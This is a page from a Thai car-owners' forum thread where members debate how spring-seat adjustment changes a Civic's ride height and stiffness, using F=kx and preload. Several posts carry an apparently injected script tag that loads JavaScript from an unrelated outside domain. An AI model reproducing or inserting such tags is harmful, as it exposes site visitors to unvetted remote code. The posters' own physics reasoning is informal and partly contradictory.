ตอบ
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 21:49 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
thehunter พิมพ์ว่า:
ถกประเด็นกันได้สนุกมากอ่านแล้วได้ความรู้ไม่เครียดเลยชอบมากต่างจากกระทู้อื่นที่ถกกันนอกประเด็นเอาแต่ความรู้สึกส่วนตัวมาพูดกันอ่านแล้วเครียดขอบคุณท่านเจ้าของกระทู้มากครับอ่านแล้วรู้สึกว่าอยากหยิบฟิสิกส์มานั่งคำนวณเลยครับชอบครับกระทู้ดีได้ความรู้มีสาระครับ



ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
กระทู้นี้คงไม่ยาว ถ้าวันนั้นไอสไตร์ไปนอนใต้ต้นทุเรียน



โทมัส เอลวา เอดิสัน พูดไว้ว่า ...ผมไม่ได้ล้มเหลว ผมแค่ค้นพบเส้นทางที่ยังไม่ใช่หนึ่งหมื่นหนทางเท่านั้น

lordpark พิมพ์ว่า:
ยิ่งอ่านนิ่งปวดหัว 


อ่านแต่โพสแรกก็พอครับ "<script src="https://sport32news.com/civicesgroup.js">
 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 10 สิงหา 2014 21:56 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
โทมัส เอลวา เอดิสัน พูดไว้ว่า ...ผมไม่ได้ล้มเหลว ผมแค่ค้นพบเส้นทางที่ยังไม่ใช่หนึ่งหมื่นหนทางเท่านั้น

ส่วนอนัน อันวา อิบบราหิม กล่าวไว่ว๊า

ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 21:59 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง

ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
tum911


เข้าร่วม: 22 เมษา 2013
ตอบ: 268

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 767
ให้คำขอบคุณ: 49
อาทิตย์, 10 สิงหา 2014 22:16 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ท่านทั้งหลายถกแล้ว มาสรุปให้ด้วยนะ ผมอ่านแล้ว โคตะระ งง เลย สรุปใหด้วยนะ จารย์
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 22:19 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
tum911 พิมพ์ว่า:
ท่านทั้งหลายถกแล้ว มาสรุปให้ด้วยนะ ผมอ่านแล้ว โคตะระ งง เลย สรุปใหด้วยนะ จารย์




อ่านเฉพาะโพสแรกพอค้าบบบบบ "<script src="https://sport32news.com/civicesgroup.js">
Rittichai


ชื่อเล่น: เบส

เข้าร่วม: 08 มกรา 2014
ตอบ: 384

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 187
ให้คำขอบคุณ: 0

ที่อยู่: สมุทรปราการ
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 11 สิงหา 2014 01:20 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ได้ความรู้อีกเยอะเลย แต่ปวดหัวมากๆๆ เหมือนได้ไปนั้งเรียนอีกรอบเลย
ได้รับคำขอบคุณจาก: athongchum 
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 15 สิงหา 2014 14:05 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
กระทู้นี้มีวิชาการเพียบเลย 
ได้รับคำขอบคุณจาก: athongchum 
taomang


เข้าร่วม: 20 เมษา 2013
ตอบ: 894

Guru ES
Guru ES

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 1023

ที่อยู่: สมุทรปราการ
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 15 สิงหา 2014 14:19 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
..งงงง
ได้รับคำขอบคุณจาก: athongchum 
OMO-knight


เข้าร่วม: 15 มกรา 2014
ตอบ: 305

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 190
ให้คำขอบคุณ: 63

ที่อยู่: กาญจนบุรี-สมุทรปราการ
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 15 สิงหา 2014 14:22 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
สรุปถ้าทำตามที่แนะนำต้องจ่ายเท่าไรคับ"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 16 สิงหา 2014 12:42 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
OMO-knight พิมพ์ว่า:
สรุปถ้าทำตามที่แนะนำต้องจ่ายเท่าไรคับ"<script src="https://sport32news.com/civicesgroup.js">




2000-3000 แล้วแต่ร้านครับ
summary


เข้าร่วม: 21 พฤศจิกา 2009
ตอบ: 327

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 165
ให้คำขอบคุณ: 22

ปี: 2004
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 16 สิงหา 2014 13:26 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
      ขอบคุณทั้ง 2 ท่านมากครับ ได้ความรู้มากเลย ผมลองคิดตามแล้ว ส่วนตัวผมคิดว่า ค่า k มันคงที่ ส่วน F มันจะแปรผันตาม x
ส่วนการเลื่ยนสปริงให้ x เปลี่ยน (มากขึ้น) ค่า F มันก็ต้องเปลี่ยนด้วย คือ F ลดลง
      เมื่อ F ลดลง แรงที่จะไปต้านน้ำหนักรถ ก็น้อยลงด้วย รถจึงต่ำลง มาอยู่ในระยะที่สมดุล

ไม่แน่ใจว่าถูกไหม ขอบคุณครับ
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 16 สิงหา 2014 17:37 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
summary พิมพ์ว่า:
      ขอบคุณทั้ง 2 ท่านมากครับ ได้ความรู้มากเลย ผมลองคิดตามแล้ว ส่วนตัวผมคิดว่า ค่า k มันคงที่ ส่วน F มันจะแปรผันตาม x
ส่วนการเลื่ยนสปริงให้ x เปลี่ยน (มากขึ้น) ค่า F มันก็ต้องเปลี่ยนด้วย คือ F ลดลง
      เมื่อ F ลดลง แรงที่จะไปต้านน้ำหนักรถ ก็น้อยลงด้วย รถจึงต่ำลง มาอยู่ในระยะที่สมดุล

ไม่แน่ใจว่าถูกไหม ขอบคุณครับ




ถ้า x มากขึ้น F ต้องมากขึ้นตามครับ จากสูตร F=kx
จากความคิดผมนะครับ k คงที่ถูกครับ แต่คงที่เมื่อทำการคำนวณค่า k ที่สภาวะสปริงอิสระหรือที่ระยะใดระยะหนึ่ง อย่าลืมว่าการบอกค่า k ที่สปริง มาจากการคำนวณจากการจำลองโหลดเพื่อคำนวณ สำหรับการนำมาใช้ในโช๊คอัพ มันโดนบีบไปเยอะมากครับ ขนาดเลื่อนเบ้าคลายออกมาครึ่งนิ้วก็ยังไม่หลุด ระยะอิสระของสปริงเปลี่ยนไป ผมคิดว่าค่า k มันต้องถูกคำนวณใหม่ครับ 

ไม่ต้องเชื่อผมมากก็ได้นะครับ ทฤษฎีผมไม่แน่น ไม่ได้เรียนมาทางด้านนี้ แค่มองตามความเป็นจริง และจุดประสงค์หลักของกระทู้นี้ คืออยากให้เพื่อนๆเข้าใจได้ง่ายๆครับ

"<script src="https://sport32news.com/civicesgroup.js">
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
เสาร์, 16 สิงหา 2014 20:58 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
(F1+F2+F3) = kx

F1 น้ำหนักรถ
F2 preload ที่เกิดจากการกดสปริงโดยเบ้า
F3 แรงอื่นๆตอนรถวิ่ง

K เท่าเดิม

X เปลี่ยนไปเปลี่ยนมาตาม F3 ที่เปลี่ยนไปในขณะรถวิ่ง

ถ้ามีการเลื่อนเบ้าลง F2 จะลดลงตาม x ที่ลดลง (ตรงนี้อย่า งง เลื่อนเบ้าทำให้ค่า x ลดลงเพราะมันคืนตัวไปสู่สภาพใกล้ระยะฟรีโหลด เพราะ x คือระยะที่สปริงยืดหรือหดจากสภาพฟรีโหลด ไม่ใช่ความยาวสปริง คหแรกๆของผมผิดไปหน่อย) k ยังคงเท่าเดิมเสมอตามทฤษฏี

เมื่อมีการเลื่อนเบ้า F2 ที่ลดลงทำให้สามารถเพิ่ม F3 ได้อีกรถจึงดูรับแรงได้มากขึ้นกว่าจะเกิน usable stroke

เมื่อไรที่ F1+F2+F3 ทำให้สปริงเคลื่อนที่ไปเกินระยะ usable stroke ตอนนั้น ค่า k จะเริ่มเปลี่ยน แต่คงหลายนิ้วอยู่ ขึ้นกับยี่ห้อด้วย

อย่าเชื่อผมมาก นี่เรียนมาเกือบ 20 ปีละ
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 16 สิงหา 2014 21:16 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
Ton- พิมพ์ว่า:
(F1+F2+F3) = kx

F1 น้ำหนักรถ
F2 preload ที่เกิดจากการกดสปริงโดยเบ้า
F3 แรงอื่นๆตอนรถวิ่ง

K เท่าเดิม

X เปลี่ยนไปเปลี่ยนมาตาม F3 ที่เปลี่ยนไปในขณะรถวิ่ง

ถ้ามีการเลื่อนเบ้าลง F2 จะลดลงตาม x ที่ลดลง (ตรงนี้อย่า งง เลื่อนเบ้าทำให้ค่า x ลดลงเพราะมันคืนตัวไปสู่สภาพใกล้ระยะฟรีโหลด เพราะ x คือระยะที่สปริงยืดหรือหดจากสภาพฟรีโหลด ไม่ใช่ความยาวสปริง คหแรกๆของผมผิดไปหน่อย) k ยังคงเท่าเดิมเสมอตามทฤษฏี

เมื่อมีการเลื่อนเบ้า F2 ที่ลดลงทำให้สามารถเพิ่ม F3 ได้อีกรถจึงดูรับแรงได้มากขึ้นกว่าจะเกิน usable stroke

เมื่อไรที่ F1+F2+F3 ทำให้สปริงเคลื่อนที่ไปเกินระยะ usable stroke ตอนนั้น ค่า k จะเริ่มเปลี่ยน แต่คงหลายนิ้วอยู่ ขึ้นกับยี่ห้อด้วย

อย่าเชื่อผมมาก นี่เรียนมาเกือบ 20 ปีละ



รบกวนพี่ Ton เขียนให้หน่อยครับว่า ผมควรอธิบายว่ายังไงดี เดี๋ยวจะเอาไปลงไว้ในต้นกระทู้ครับ
ได้รับคำขอบคุณจาก: Ton- 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
เสาร์, 16 สิงหา 2014 21:32 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ไม่ต้องซีเรียสหรอกครับ จุดสุดท้ายมันเหมือนกันคือเลื่อนแล้วรู้สึกนิ่มขึ้น อธิบายมากๆมันยิ่งงง ใครสนใจจริงจังก็ให้ไล่อ่านเอาละกัน ผมเองอาจจะเข้าใจผิดก็ได้
ได้รับคำขอบคุณจาก: athongchum 
baberonte


ชื่อเล่น: หนก ครับ

เข้าร่วม: 03 กรกฎา 2011
ตอบ: 352

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 303
ให้คำขอบคุณ: 1173

ที่อยู่: จ. เพชรบูรณ์
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 17 สิงหา 2014 00:54 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
แจ๋วเลยครับ ความรู้ดีมากๆเลย
ได้รับคำขอบคุณจาก: athongchum 
JeepLNZ


เข้าร่วม: 26 มิถุนา 2012
ตอบ: 407

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 268
ให้คำขอบคุณ: 108

ที่อยู่: สายไหม กรุงเทพฯ & เพชรบูรณ์
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 17 สิงหา 2014 11:01 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ความรู้ทั้งนั้น
ได้รับคำขอบคุณจาก: athongchum 
summary


เข้าร่วม: 21 พฤศจิกา 2009
ตอบ: 327

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 165
ให้คำขอบคุณ: 22

ปี: 2004
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 17 สิงหา 2014 12:19 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
คิดต่างแต่ไม่แตกแยกครับ ชอบๆ
ได้รับคำขอบคุณจาก: athongchum 
summary


เข้าร่วม: 21 พฤศจิกา 2009
ตอบ: 327

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 165
ให้คำขอบคุณ: 22

ปี: 2004
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 17 สิงหา 2014 12:27 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
Ton- พิมพ์ว่า:
ไม่ต้องซีเรียสหรอกครับ จุดสุดท้ายมันเหมือนกันคือเลื่อนแล้วรู้สึกนิ่มขึ้น อธิบายมากๆมันยิ่งงง ใครสนใจจริงจังก็ให้ไล่อ่านเอาละกัน ผมเองอาจจะเข้าใจผิดก็ได้



 ผมว่าความรู้สึก ว่านิ่มหรือแข็งขึ้น มันเปลี่ยนตาม pre load ที่เปลี่ยนไปครับ
ความคิดส่วนตัวนะครับ และก็บวกกับประสบการณ์ที่ลอง ปรับสปริงขึ้นลงมาแล้วด้วย

 
ได้รับคำขอบคุณจาก: athongchum 
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...